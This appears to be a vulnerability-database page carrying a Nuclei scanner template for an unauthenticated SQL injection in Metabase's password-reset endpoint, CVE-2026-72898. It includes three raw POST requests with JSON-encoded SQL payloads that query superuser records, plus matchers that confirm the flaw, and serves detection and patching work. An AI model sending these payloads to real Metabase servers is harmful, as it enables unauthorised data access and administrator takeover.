Metabase - Unauthenticated SQL Injection
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Exploit for CVE-2026-72898 | 12 Aug 202613:54 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 13 Aug 202621:08 | – | githubexploit | |
| Exploit for SQL Injection in Metabase | 15 Aug 202609:06 | – | githubexploit | |
| CVE-2026-72898 | 10 Aug 202617:55 | – | attackerkb | |
| CVE-2026-72898 vulnerabilities | 13 Aug 202620:26 | – | cgr | |
| CVE-2026-72898 | 10 Aug 202618:04 | – | circl | |
| Metabase SQL Injection Vulnerability | 11 Aug 202600:00 | – | cisa_kev | |
| CVE-2026-72898 | 10 Aug 202617:55 | – | cve | |
| CVE-2026-72898 Metabase SQL injection via password reset endpoint | 10 Aug 202617:55 | – | cvelist | |
| EUVD-2026-55690 | 10 Aug 202617:55 | – | euvd |
10
id: CVE-2026-72898
info:
name: Metabase - Unauthenticated SQL Injection
author: 0x_Akoko,pdteam
severity: critical
description: |
Metabase contains a sql injection caused by improper sanitization of input in the '/reset_password' database endpoint, letting remote unauthenticated attackers gain administrator access, exploit requires no special privileges.
impact: |
Remote unauthenticated attackers can execute arbitrary SQL and gain administrator access to the Metabase instance.
remediation: |
Update to the latest version of Metabase.
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-vwf4-m7j8-wcjf
- https://securityonline.info/metabase-sql-injection-zero-day-exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2026-72898
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-72898
epss-score: 0.104
epss-percentile: 0.95317
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
shodan-query: http.title:"Metabase"
fofa-query: title="Metabase"
product: metabase
vendor: metabase
tags: cve,cve2026,sqli,metabase,unauth,rce,kev,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":{"select":1},"password":"TestPassword1!"}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains_all(body, "should be a string", "{:select 1}")'
condition: and
internal: true
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":{"select":["email","id"],"from":["core_user"],"where":["=","is_superuser",true],"limit":1},"password":"TestPassword1!"}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains_all(body, "is_superuser", "core_user")'
condition: and
internal: true
- raw:
- |
POST /api/session/reset_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"token":"1_0000","password":"TestPassword1!","user-id":{"select":["id"],"from":["core_user"],"where":["=","is_superuser",true],"limit":1}}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains(body, "Invalid reset token")'
- '!contains(body, "disallowed key")'
condition: and
# digest: 4a0a00473045022100f98dd61296bcd9e8f2ba073dde66011d6b116eef2aa108cb6dedbfaa2ddf0c6a0220188c83002fdc3d388ccbb196975aff3b682db6bb599530936f0d78c202860518:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2026 03:46Current
5.7Medium risk
Vulners AI Score5.7
CVSS 410
CVSS 3.110
EPSS0.104
SSVC